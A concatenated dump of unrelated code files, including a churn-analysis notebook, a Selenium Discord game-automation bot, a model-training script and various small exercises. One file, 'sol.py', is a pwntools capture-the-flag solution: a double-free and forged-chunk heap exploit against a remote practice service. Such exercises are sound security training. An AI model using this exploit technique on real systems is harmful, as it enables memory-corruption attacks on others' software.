adding a few more plots...\n\n# In[35]:\n\n\nsns.displot(\n customer_subset, x=\"monthly_charge\", col=\"contract\", row=\"gender\",\n binwidth=3, height=3, facet_kws=dict(margin_titles=True),\n)\n\n\n# In[51]:\n\n\nsns.displot(\n customer_subset, x=\"monthly_charge\", col=\"contract\", row=\"senior_citizen\",\n binwidth=3, height=3, facet_kws=dict(margin_titles=True),\n)\n\n\n# In[57]:\n\n\nsns.displot(\n customer_subset, x=\"payment_method\", col=\"contract\", row=\"senior_citizen\",\n binwidth=10, height=5, facet_kws=dict(margin_titles=True),\n)\n\n\n# # 3. JOIN THE DATAFRAMES\n\n# In[60]:\n\n\nchurn.customer_id = churn.customer_id.apply(lambda id_num: \"\".join(id_num.split(\"-\")))\nmerged_df = pd.merge(customer_subset, churn, how='inner')\n\n\n# # 4. EXPLORE CHURN HYPOTHESES\n\n# ### 1. Question: Do younger customers churn at a higher rate?\n# **Hypothesis:** Younger customers are always looking for new technology and better deals, while older customers might be less inclined to switch companies from what they are familiar with.\n\n# In[79]:\n\n\nmerged_df[\"churn_label\"].value_counts()\n\nsns.boxplot(\n x=\"churn_label\",\n y=\"age\",\n data=merged_df\n)\n\n\n# **Plot Description:** The median age of people with a churn label of 'Yes' is 50 and the max is 65, while the median age of people with a churn label of 'No' is around 45 with a max.\n\n# In[82]:\n\n\nsns.displot(\n merged_df[merged_df[\"churn_label\"] == \"No\"],\n x=\"age\",\n hue=\"senior_citizen\"\n)\n\n\n# In[83]:\n\n\nsns.displot(\n merged_df[merged_df[\"churn_label\"] == \"Yes\"],\n x=\"age\",\n hue=\"senior_citizen\"\n)\n\n\n# **Plot Description:** These two plots compare the frequency of the ages of people whose churn labels were \"Yes\" and \"No\". Interestingly, senior citizens are slightly more likely to churn than not (there is ~140 count for 65-80 year olds with 'Yes', in comparison with ~125 for 'No'). Alternatively, non-senior citizens are much more likely to not churn (except for age 50 and 60, the frequency of those with a churn label of \"No\" is greater than 250.\n\n# ### 2. Question: -- create your own --\n# **Hypothesis:** \n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n\n# ### 3. Question: -- create your own --\n# **Hypothesis:**\n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n\n# In[ ]:\n\n\n\n\n\n# **Plot Description:**\n","sub_path":"P2P2/Project 2 Part 2.py","file_name":"Project 2 Part 2.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"545993997","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException, TimeoutException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\nimport time\nfrom random import randint\nfrom playsound import playsound\n\n\n# In[5]:\n\n\ndef login():\n\tpath = '/Users/inika/Selenium Webdrivers/chromedriver'\n\tdriver = webdriver.Chrome(path)\n\n\tusername = \" \"\n\tpassword = \" \"\n\n\tdriver.get('https://discord.com')\n\twait = WebDriverWait(driver, 10)\n\ttime.sleep(3)\n\t\n\tretries = 3\n\tfor i in range(retries):\n\t\ttry:\n\t\t\tprint(\"Attempting Login #{}..\".format(i+1))\n\t\t\tdriver.find_element_by_link_text(\"Login\").click()\n\t\t\ttime.sleep(2)\n\t\t\tmail = driver.find_element_by_name(\"email\")\n\t\t\tpwd = driver.find_element_by_name(\"password\")\n\t\t\tmail.send_keys(username)\n\t\t\tpwd.send_keys(password)\n\t\t\tpwd.submit()\n\t\t\tbreak\n\n\t\t# except NoSuchElementException:\n\t\t# \tdriver.find_element_by_link_text(\"Open\").click() \n\n\t\texcept (TimeoutException, NoSuchElementException) as e:\n\t\t\tprint(\"Failed. Retrying...\")\n\t\t\ttime.sleep(2)\n\t\t\tcontinue\n\n\treturn driver,wait\n\ndef goToServer(server):\n\tservers = wait.until(ec.presence_of_all_elements_located((By.XPATH,\"//div[@class = 'listItem-2P_4kh']\")))[2:-4]\n\tfor s in servers:\n\t\ta = s.find_element_by_tag_name('a')\n\t\ttry:\n\t\t\tif a.get_attribute(\"aria-label\")==server:\n\t\t\t\ta.click()\n\t\t\t\tbreak\n\t\texcept StaleElementReferenceException:\n\t\t\tprint(\"No such Server\")\n\t\t\t\ndef goToChannel(channel):\n\tchannels = wait.until(ec.presence_of_all_elements_located((By.CLASS_NAME,\"name-3_Dsmg\")))\n\tfor c in channels:\n\t\tif c.text == channel.lower():\n\t\t\tc.click()\n\t\t\t\ndef sendMessage(message): #sends message and for bot messages, checks if it triggered an event\n\tcurrent_channel = driver.find_element_by_xpath(\"//h3[@class = 'title-29uC1r base-1x0h_U size16-1P40sf']\").text\n\ttextbox = wait.until(ec.presence_of_element_located((By.XPATH,'//div[@aria-label = \"Message #'+current_channel+'\"]')))\n\ttextbox.send_keys(message)\n\ttextbox.send_keys(Keys.RETURN)\n\tif 'pls' in message and 'why my pls rich' not in message:\n\t\ttime.sleep(1)\n\t\tevents()\n\t\ndef clear(n=10):\n\tn = len(driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\"))\n\tif n>0:\n\t\t# while(n!=0):\n\t\tsendMessage('!clear '+str(n))\n\t\ttime.sleep(4)\n\t\t\t# n = len(driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\"))\n\ndef frogSearch(safe):\n\tsendMessage('pls dep all')\n\tclear()\n\tsendMessage('pls search')\n\tunsafes = ['sewer','dumpster','car','street','hospital','dog']\n\tgood_places = ['dresser','bed','mailbox','couch']\n\tplaces = [i.text for i in driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']//code\")]\n\tfor i in unsafes:\n\t\tif i in places:\n\t\t\tplaces.remove(i)\n\tif len(places)!=0:\n\t\ti=-1\n\t\tfor p in good_places:\n\t\t\tif p in places:\n\t\t\t\ti = places.index(p)\n\t\t\t\tbreak\n\t\tif i<0:\n\t\t\trandint(0,len(places)-1)\n\t\tsendMessage(places[i])\n\telse:\n\t\tsendMessage('pls pet pat')\n\ttime.sleep(1)\n\t#result\n\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\tfor msg in msgs:\n\t\tif 'area searched' in msg.text.lower():\n\t\t\tprint(\"Result: \",msg.text.split('\\n')[-1])\n\ndef postMeme():\n\tmemes = ['n','e','r','d']\n\tsendMessage('pls pm')\n\tsendMessage(memes[randint(0,len(memes)-1)])\n\tevents()\n\ttime.sleep(1)\n\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\tfor msg in msgs:\n\t\tif 'your meme' in msg.text.lower():\n\t\t\tprint(\"Result: \",msg.text)\n\t\t\tif 'laptop is broken' in msg.text.lower():\n\t\t\t\tsendMessage('pls withdraw 1000')\n\t\t\t\tsendMessage('pls buy laptop')\n\t\t\t\tprint(\"Bought laptop for 1000 coin\")\n\ndef fish():\n\tsendMessage('pls fish')\n\ttime.sleep(1)\n\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\tfor msg in msgs:\n\t\tif 'fish is too strong' in msg.text.lower():\n\t\t\tt = msg.find_element_by_xpath(\"./code\").text\n\t\t\tsendMessage(t)\n\t\t\tprint(msg.text)\n\t\t\tplaysound('/Users/inika/Downloads/notify.mp3')\n\t\t\tprint(\"Typed: \",t)\n\t\t\tmsgs = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\t\t\t\n\t#result\n\tfor msg in msgs:\n\t\tif 'cast out your line' in msg.text.lower():\n\t\t\tprint(\"Result: \",msg.text.split('\\n')[0])\n\ndef events():\n\tevent = False\n\ttry:\n\t\ttime.sleep(2)\n\t\tli = driver.find_elements_by_xpath(\"//div[@class = 'markup-2BOw-j messageContent-2qWWxC']\")\n\t\tfor i in range(len(li)):\n\t\t\tx = li[i].text.lower()\n\t\t\tif \"event \" in x or \"common event\" in x or \"rare event\" in x and \"lookout for \" not in x:\n\t\t\t\tevent = True\n\t\t\t\tplaysound('/Users/inika/Downloads/notify.mp3')\n\t\t\t\tbreak\n\n\t\tif event:\n\t\t\tevent1=li[i]\n\t\t\tevent2=li[i+1]\n\t\t\tprint(event1.text)\n\t\t\tprint(event2.text)\n\t\t\tresponse = event2.find_element_by_xpath(\".//code\").text\n\t\t\tsendMessage(response)\n\t\t\t\n\t\t\tif \"hit\" in event2.text or 'boss' in event2.text.lower():\n\t\t\t\tfor _ in range(7):\n\t\t\t\t\tsendMessage(response) \n\n\t\t\twait_long = WebDriverWait(driver, 40)\n\t\t\ttry:\n\t\t\t\tmsgs = wait_long.until(ec.presence_of_all_elements_located((By.XPATH,\"//div[@class = 'embedFieldValue-nELq2s']\")))\n\t\t\texcept TimeoutException:\n\t\t\t\tclear()\n\t\t\t\treturn\n\t\t\tfor msg in msgs:\n\t\t\t\tif 'Morticia' in msg.text:\n\t\t\t\t\tprint(\"Result: \",msg.text) \n\t\t\t\t\tclear() \n\t\t\t\t\n\texcept NoSuchElementException:\n\t\t\tpass\n\t\t\n\texcept StaleElementReferenceException:\n\t\tpass\n\n\ndef bot():\n\tclear(100)\n\tprefix = 'pls '\n\tcommands = [prefix+c for c in ['beg','fish','pm','search']]\n\tpetcommands = [prefix+'pet '+c for c in ['feed','wash','play','pat']] \n\twhile True:\n\t\tfor com in commands:\n\t\t\tclear()\n\t\t\tif 'pm' in com:\n\t\t\t\tpostMeme()\n\t\t\telif 'search' in com:\n\t\t\t\tfrogSearch(safe = True)\n\t\t\telif 'fish' in com:\n\t\t\t\tfish()\n\t\t\telse:\n\t\t\t\tsendMessage(com) \n\t\ttime.sleep(7)\n\n\n# In[ ]:\n\n\ndriver,wait = login()\ngoToServer('sandcastle')\ngoToChannel('spam')\nbot()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"dankmemerbot.py","file_name":"dankmemerbot.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604362120","text":"from pwn import *\n\ndef free(index):\n global r\n raw_input('debug free {}'.format(index))\n r.recvuntil('input:')\n r.sendline('0')\n r.recvuntil('x =')\n r.sendline(str(index))\n\ndef malloc(index):\n global r\n raw_input('debug malloc {}'.format(index))\n r.recvuntil('input:')\n r.sendline('1')\n r.recvuntil('x =')\n r.sendline(str(index))\n\ndef string(index, data):\n global r\n raw_input('debug string {} {}'.format(index, data))\n r.recvuntil('input:')\n r.sendline('2')\n r.recvuntil('x =')\n r.sendline(str(index))\n r.recvuntil('string =')\n r.sendline(data)\n\ndef show(index):\n global r\n raw_input('debug show {}'.format(index))\n r.recvuntil('input:')\n r.sendline('2')\n r.recvuntil('x =')\n r.sendline(str(index))\n\n#r = process('forging_chunk')\nr = remote('140.110.112.77', 9001)\nraw_input('debug:')\nvictim = int(r.recvline().split(':')[1].strip()[2:], 16)\nsize = int(r.recvline().split(':')[1].strip()[2:], 16)\nprint('victim: {}, size: {}'.format(hex(victim), hex(size)))\n\nmalloc(0)\nstring(0, 'a' * 8)\nmalloc(1)\nstring(1, 'b' * 8)\nfree(0)\nfree(1)\nfree(0)\nmalloc(0)\nstring(0, p64(victim - 0x10))\nmalloc(0)\nmalloc(0)\nmalloc(0)\nstring(0, p64(0xdeadbeef))\nr.recvuntil('input:')\nr.sendline('5')\nr.interactive()\n","sub_path":"Games/pwnctf/Pwno/forging_chunk/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"261193653","text":"def choolate(index):\n\tif(index == []):\n\t\treturn 0\n\t\t\n\tif(len(index) == 1):\n\t\treturn 1\n\tans = 1\n\n\tfor i in range(len(index) - 1):\n\t\tans = ans * (index[i + 1] - index[i])\n\n\treturn ans\n\nif(__name__ == \"__main__\"):\n\tcnt = int(raw_input())\n\tl = [tmp for tmp in raw_input().split(' ')]\n\tindex = []\n\tfor i, v in enumerate(l):\n\t\tif(v == \"Codeforces Round 352\"):\n\t\t\tindex.append(i)\n\tprint(choolate(index))","sub_path":"online_judge/codeforces/617, Codeforces Round #340/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284301200","text":"#A8\r\ntext_1 = \"Bu cümlede 4 elma 5 armut 8 tane de muz var\"\r\ntext_2 = 'bu ikinci cümlede 9 kiraz 3 karpuz var'\r\ntext_1=text_1.split(' ')\r\ntext_2=text_2.split(' ')\r\nsayi_1=text_1[2]+text_1[4]+text_1[6]\r\nsayi_2=text_2[3]+text_2[5]\r\nsayi_1=int(sayi_1)\r\nsayi_2=int(sayi_2)\r\nprint(sayi_1+sayi_2)\r\n","sub_path":"1.Week/A8.py","file_name":"A8.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"401051806","text":"import open_bci_v3\nimport time\nimport filters\nimport time\nimport csv\nimport numpy as np\nimport open_bci_v3 as bci\nimport udp_server\n\nclass Data_Buffer():\n\n\tdef __init__(self):\n\t\tself.filt = filters.Filters()\n\t\tself.data_buffer = []\n\t\tself.count = 0\n\t\tself.udp_packet = []\n\n\tdef buffer(self,sample):\n\t\tcount = 0;\n\t\tif sample and ((count%8) == 0):\n\t\t\tEEG = []\n\t\t\tEEG = self.filt.filter_data(sample.channel_data)\n\t\t\tsend = []\n\n\t\t\tif (EEG is not None) and (count%4==0):\n\t\t\t\tuv = EEG[0]\n\t\t\t\tfft = EEG[1]\n\t\t\t\tfft1 = fft[0,10:42]\n\t\t\t\tfft2 = fft[9,10:42]\n\n\t\t\t\tfor chan in uv:\n\t\t\t\t\tsend.append(chan[0])\n\t\t\t\tfor pt in fft1:\n\t\t\t\t\tsend.append(pt)\n\t\t\t\tfor pt in fft2:\n\t\t\t\t\tsend.append(pt)\n\t\t\t\tprint(np.shape(send))\n\t\t\t\tprint(send)\n\t\t\t\tudp.receive(send)\n\n\t\t# DATA FORMAT\n\t\t# FIRST 18 values are from the raw voltage\n\t\t# 0-5: subj 1 eeg\n\t\t# 6: subj 1 ecg\n\t\t# 7: null\n\t\t# 8-13: subj2 eeg\n\t\t# 14: subj2 ecg\n\t\t# 15: null\n\t\t# 16-2080: channels 0-5 and 8-13 fft data (129 points per channel)\n\t\tself.count = self.count+1\n\ndef main():\n\n\n\tglobal udp\n\tudp = udp_server.UDPServer()\n\n\tdb = Data_Buffer()\n\tboard = bci.OpenBCIBoard(port='/dev/ttyUSB0', send=db)\n\tboard.start_streaming(db.buffer)\n\n\t################################\n\t#\n\t# SIMULATION VERSION\n\t#\n\n\t# channel_data = []\n\t# with open('aaron_test_data/latest_trials/trial2.txt', 'r') as file:\n\t# \treader = csv.reader(file, delimiter=',')\n\t# \t# next(file)\n\t# \tfor j,line in enumerate(reader):\n\t# \t\tline = [x.replace(' ','') for x in line]\n\t# \t\tchannel_data.append(line) #list\n\t# \t\tprint(line)\n\n\n\n\t# print(len(channel_data))\n\t# last_time_of_program = 0\n\t# start = time.time()\n\t# for i,sample in enumerate(channel_data):\n\t# \tend = time.time()\n\t# \t#Mantain the 250 Hz sample rate when reading a file\n\t# \t#Wait for a period of time if the program runs faster than real time\n\t# \ttime_of_recording = i/250\n\t# \ttime_of_program = end-start\n\t# \tprint('i/250 (time of recording)', time_of_recording)\n\t# \tprint('comp timer (time of program)', time_of_program)\n\t# \tif time_of_recording > time_of_program:\n\t# \t\t# print('PAUSING ', time_of_recording-time_of_program, ' Seconds')\n\t# \t\ttime.sleep(time_of_recording-time_of_program)\n\t# \tdb.buffer(sample)\n\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"data_buffer.py","file_name":"data_buffer.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"434326197","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ManagedClusterPoolUpgradeProfile(Model):\n \"\"\"The list of available upgrade versions.\n\n All required parameters must be populated in order to send to Azure.\n\n :param kubernetes_version: Required. Kubernetes version (major, minor,\n patch).\n :type kubernetes_version: str\n :param name: Pool name.\n :type name: str\n :param os_type: Required. OsType to be used to specify os type. Choose\n from Linux and Windows. Default to Linux. Possible values include:\n 'Linux', 'Windows'. Default value: \"Linux\" .\n :type os_type: str or\n ~azure.mgmt.containerservice.v2019_02_01.models.OSType\n :param upgrades: List of orchestrator types and versions available for\n upgrade.\n :type upgrades: list[str]\n \"\"\"\n\n _validation = {\n 'kubernetes_version': {'required': True},\n 'os_type': {'required': True},\n }\n\n _attribute_map = {\n 'kubernetes_version': {'key': 'kubernetesVersion', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'os_type': {'key': 'osType', 'type': 'str'},\n 'upgrades': {'key': 'upgrades', 'type': '[str]'},\n }\n\n def __init__(self, *, kubernetes_version: str, name: str=None, os_type=\"Linux\", upgrades=None, **kwargs) -> None:\n super(ManagedClusterPoolUpgradeProfile, self).__init__(**kwargs)\n self.kubernetes_version = kubernetes_version\n self.name = name\n self.os_type = os_type\n self.upgrades = upgrades\n","sub_path":"src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2019_02_01/models/managed_cluster_pool_upgrade_profile_py3.py","file_name":"managed_cluster_pool_upgrade_profile_py3.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"648581285","text":"# -*- coding: utf-8 -*-\nfrom feedvest.models.opml import export_opml\nfrom feedvest.tests.helpers import assert_xml_equals\n\n\nclass TestExportOPML:\n\n def test_no_subscriptions(self):\n expected = b\"\"\"\n \n \n Subscriptions\n \n \n \"\"\"\n\n assert_xml_equals(export_opml([]), expected)\n\n def test_one_subscription(self, subscription):\n feed = subscription.feed\n feed.title = u'タイトル'\n\n expected = u\"\"\"\n \n \n Subscriptions\n \n \n \n \n \"\"\".format(feed).encode('utf-8')\n\n assert_xml_equals(export_opml([subscription]), expected)\n","sub_path":"feedvest/tests/api/models/test_opml.py","file_name":"test_opml.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"310871966","text":"import random\n\nq = random.randint(1, 20)\ncnt = 0\nwhile cnt <= 4:\n if cnt != 4:\n print(\"기회가\", 4 - cnt, \"번 남았습니다. 1-20 사이의 숫자를 맞춰보세요:\", sep=' ')\n cnt += 1\n a = int(input())\n if a == q:\n print(\"축하합니다.\", cnt, \"번만에 숫자를 맞추셨습니다.\", sep=' ')\n break\n elif a > q:\n print(\"Down\")\n else:\n print(\"Up\")\n else:\n print(\"아쉽습니다. 정답은\", q, \"였습니다.\", sep=' ')\n break\n","sub_path":"6-1.py","file_name":"6-1.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"443900338","text":"import time\nfrom mpi4py import MPI\nimport pickle\nimport timeit\nimport msgpack\nimport sys\nfrom test_pb2 import BunchOfTestDicts, TestDict, Pair\n\ndef writePB():\n bOTD = BunchOfTestDicts()\n for thisDict in realStuff:\n tD = bOTD.dicts.add()\n for k, v in thisDict.items():\n pair = tD.pairs.add()\n pair.key = k\n pair.value = v\n\n with open('realstuff.pb', 'wb') as f:\n f.write(bOTD.SerializeToString())\n\ndef readPB():\n bOTD = BunchOfTestDicts()\n with open('realstuff.pb', 'rb') as f:\n bOTD.ParseFromString(f.read())\n thisDictList = [{thisPair.key: thisPair.value\n for thisPair in thisBufferedDict.pairs}\n for thisBufferedDict in bOTD.dicts]\n return thisDictList\n\ndef writeReadPB():\n bOTD = BunchOfTestDicts()\n for thisDict in realStuff:\n tD = bOTD.dicts.add()\n for k, v in thisDict.items():\n pair = tD.pairs.add()\n pair.key = k\n pair.value = v\n #serializedPB = bOTD.SerializeToString()\n #print 'serialized PB length: %s'%len(serializedPB)\n #newBOTD = BunchOfTestDicts()\n #newBOTD.ParseFromString(serializedPB)\n newBOTD = bOTD\n thisDictList = [{thisPair.key: thisPair.value\n for thisPair in thisBufferedDict.pairs}\n for thisBufferedDict in newBOTD.dicts]\n return thisDictList\n\n\nwith open('realstuff.pkl', 'rb') as f:\n realStuff = pickle.load(f)\n\nsetupStatement=\"\"\"\\\nfrom __main__ import writePB, readPB, writeReadPB, realStuff\n\"\"\"\n\n#print ('write: %s' % timeit.timeit(\"writePB()\", setup=setupStatement, number=1))\n#print ('read: %s' % timeit.timeit(\"readPB()\", setup=setupStatement, number=1))\nprint ('writeRead: %s' % timeit.timeit(\"writeReadPB()\", setup=setupStatement, number=10))\n","sub_path":"joel_protobuf_test/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"21151692","text":"from torch import nn\n\nfrom ops.basic_ops import ConsensusModule, Identity\nfrom transforms import *\nfrom torch.nn.init import normal, constant\n\nimport numpy as np\n\n\nimport TRNmodule\nimport MemNNmodule\n\n\n# rmed : query_base_model, img_feature_dim\n# added : key_dim, value_dim, query_dim, query_update_method, hop_method, no_softmax_on_p\nclass TSN(nn.Module):\n def __init__(self, num_class, num_segments, modality,\n base_model='resnet101', new_length=None,\n consensus_type='avg', before_softmax=True,\n dropout=0.8,key_dim=256,value_dim=256,query_dim=256,query_update_method=None,\n crop_num=1, partial_bn=True, freezeBN_Eval=False, freezeBN_Require_Grad_True=False, print_spec=True, num_hop=1, hop_method=None, \n num_CNNs=1, no_softmax_on_p=False, freezeBackbone=False, CustomPolicy=False, sorting=False, MultiStageLoss=False, MultiStageLoss_MLP=False, \\\n how_to_get_query='mean', only_query=False, CC=False, channel=1024, memory_dim=1, image_resolution=256,how_many_objects=1, Each_Embedding=False, Curriculum=False, Curriculum_dim=512, lr_steps=None):\n super(TSN, self).__init__()\n self.modality = modality\n self.num_segments = num_segments\n self.reshape = True\n self.before_softmax = before_softmax\n self.dropout = dropout\n self.crop_num = crop_num\n self.consensus_type = consensus_type\n self.img_feature_dim = key_dim # the dimension of the CNN feature to represent each frame\n self.freezeBN_Eval = freezeBN_Eval\n self.freezeBN_Require_Grad_True = freezeBN_Require_Grad_True\n self.freezeBackbone = freezeBackbone\n self.CustomPolicy = CustomPolicy\n self.MultiStageLoss = MultiStageLoss\n self.CC = CC\n self.memory_dim = memory_dim\n self.image_resolution = image_resolution\n self.how_many_objects = how_many_objects\n self.Curriculum = Curriculum\n self.lr_steps = lr_steps\n\n # self.sorting = sorting\n\n if not before_softmax and consensus_type != 'avg':\n raise ValueError(\"Only avg consensus can be used after Softmax\")\n\n if new_length is None:\n self.new_length = 1 if modality == \"RGB\" else 5\n else:\n self.new_length = new_length\n if print_spec == True:\n print((\"\"\"\n Initializing TSN with base model: {}.\n TSN Configurations:\n input_modality: {}\n num_segments: {}\n new_length: {}\n consensus_module: {}\n dropout_ratio: {}\n img_feature_dim: {}\n \"\"\".format(base_model, self.modality, self.num_segments, self.new_length, consensus_type, self.dropout, self.img_feature_dim)))\n\n self._prepare_base_model(base_model) # assign 'self.base_model'\n\n\n feature_dim = self._prepare_tsn(num_class)\n\n if self.modality == 'Flow':\n print(\"Converting the ImageNet model to a flow init model\")\n self.base_model = self._construct_flow_model(self.base_model)\n print(\"Done. Flow model ready...\")\n elif self.modality == 'RGBDiff':\n print(\"Converting the ImageNet model to RGB+Diff init model\")\n self.base_model = self._construct_diff_model(self.base_model)\n print(\"Done. RGBDiff model ready.\")\n\n\n if consensus_type in ['TRN', 'TRNmultiscale']:\n # plug in the Temporal Relation Network Module\n self.consensus = TRNmodule.return_TRN(consensus_type, self.img_feature_dim, self.num_segments, num_class) # (relation_type, img_feature_dim, num_frames, num_class)\n elif consensus_type in ['MemNN']:\n self.consensus = MemNNmodule.return_MemNN(consensus_type, self.num_segments, num_class, \\\n key_dim=key_dim, value_dim=value_dim, query_dim=query_dim, memory_dim=memory_dim, query_update_method=query_update_method, \\\n no_softmax_on_p=no_softmax_on_p, channel=channel, num_hop=num_hop, hop_method=hop_method, num_CNNs=num_CNNs, \\\n sorting=sorting, MultiStageLoss=MultiStageLoss, MultiStageLoss_MLP=MultiStageLoss_MLP, how_to_get_query=how_to_get_query, only_query=only_query, CC=CC, how_many_objects=how_many_objects,\\\n Each_Embedding=Each_Embedding, Curriculum=Curriculum, Curriculum_dim=Curriculum_dim, lr_steps=lr_steps)\n else: # agv or something else\n self.consensus = ConsensusModule(consensus_type)\n\n if not self.before_softmax:\n self.softmax = nn.Softmax()\n\n self._enable_pbn = partial_bn\n if partial_bn:\n self.partialBN(True)\n\n def _prepare_tsn(self, num_class):\n try:\n feature_dim = getattr(self.base_model, self.base_model.last_layer_name).in_features # 1024\n except:\n feature_dim = None\n if self.base_model.last_layer_name is not None:\n raise ValueError(\"Something Wrong. Check\")\n\n if self.dropout == 0:\n if self.consensus_type in ['TRN','TRNmultiscale']:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, self.img_feature_dim))\n\n elif self.consensus_type in ['MemNN']:\n self.base_model = nn.Sequential(*list(self.base_model.children())[:-1]) # remove final FC layer\n # setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, self.img_feature_dim))\n\n else:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, num_class))\n self.new_fc = None\n\n else: # dropout not ZERO\n try:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Dropout(p=self.dropout))\n except:\n if self.base_model.last_layer_name is not None:\n raise ValueError(\"Something Wrong. Check\")\n\n if self.consensus_type in ['TRN','TRNmultiscale']:\n # create a new linear layer as the frame feature\n self.new_fc = nn.Linear(feature_dim, self.img_feature_dim)\n\n elif self.consensus_type in ['MemNN']:\n self.new_fc = None\n\n else:\n # the default consensus types in TSN\n self.new_fc = nn.Linear(feature_dim, num_class)\n\n std = 0.001\n if self.consensus_type not in ['MemNN']:\n if self.new_fc is None: # dropout 0\n normal(getattr(self.base_model, self.base_model.last_layer_name).weight, 0, std)\n constant(getattr(self.base_model, self.base_model.last_layer_name).bias, 0)\n else:\n normal(self.new_fc.weight, 0, std)\n constant(self.new_fc.bias, 0)\n\n return feature_dim # 1024 on BNInception\n\n def _prepare_base_model(self, base_model):\n if 'resnet' in base_model or 'vgg' in base_model:\n self.base_model = getattr(torchvision.models, base_model)(True)\n self.base_model.last_layer_name = 'fc'\n # print (self.base_model)# (conv1, bn1, relu, maxpool, layer1, layer2, layer3, layer4, avgpool, fc)\n\n if self.CC: # CC\n self.base_model_first_conv = self.base_model.conv1\n self.base_model_cc = nn.Conv2d(3, 64, 1, 2)\n self.base_model = nn.Sequential(*list(self.base_model.children())[1:])\n\n self.base_model.last_layer_name = '8'\n\n if self.memory_dim == 2:\n self.base_model = nn.Sequential(*list(self.base_model.children())[:-2])\n self.base_model.last_layer_name = None\n\n self.input_size = 224\n self.input_mean = [0.485, 0.456, 0.406]\n self.input_std = [0.229, 0.224, 0.225]\n\n if self.modality == 'Flow':\n self.input_mean = [0.5]\n self.input_std = [np.mean(self.input_std)]\n elif self.modality == 'RGBDiff':\n self.input_mean = self.input_mean + [0] * 3 * self.new_length\n self.input_std = self.input_std + [np.mean(self.input_std) * 2] * 3 * self.new_length\n\n elif base_model == 'BNInception':\n import model_zoo\n self.base_model = getattr(model_zoo, base_model)()\n self.base_model.last_layer_name = 'fc'\n self.input_size = 224\n self.input_mean = [104, 117, 128]\n self.input_std = [1]\n\n if self.modality == 'Flow':\n self.input_mean = [128]\n elif self.modality == 'RGBDiff':\n self.input_mean = self.input_mean * (1 + self.new_length)\n\n if self.CC:\n raise ValueError(\"CC is not supported on BNInception architecture.\")\n\n if self.memory_dim == 2:\n raise ValueError(\"memory_dim larger than 1 is not supported on BNInception architecture.\")\n # self.base_model_first_conv = nn.Sequential(*list(self.base_model.children())[:1])\n # self.base_model_cc = nn.Conv2d(3, 64, 1, 2)\n\n # self.base_model = self.base_model.children()\n # self.base_model.last_layer_name = '218'\n\n elif base_model == 'InceptionV3':\n import model_zoo\n self.base_model = getattr(model_zoo, base_model)()\n self.base_model.last_layer_name = 'top_cls_fc'\n self.input_size = 299\n self.input_mean = [104,117,128]\n self.input_std = [1]\n if self.modality == 'Flow':\n self.input_mean = [128]\n elif self.modality == 'RGBDiff':\n self.input_mean = self.input_mean * (1+self.new_length)\n elif 'inception' in base_model:\n import model_zoo\n self.base_model = getattr(model_zoo, base_model)()\n self.base_model.last_layer_name = 'classif'\n self.input_size = 299\n self.input_mean = [0.5]\n self.input_std = [0.5]\n else:\n raise ValueError('Unknown base model: {}'.format(base_model))\n\n def train(self, mode=True):\n \"\"\"\n Override the default train() to freeze the BN parameters\n :return:\n \"\"\"\n super(TSN, self).train(mode)\n\n count = 0\n if self._enable_pbn: # partial batch norm\n 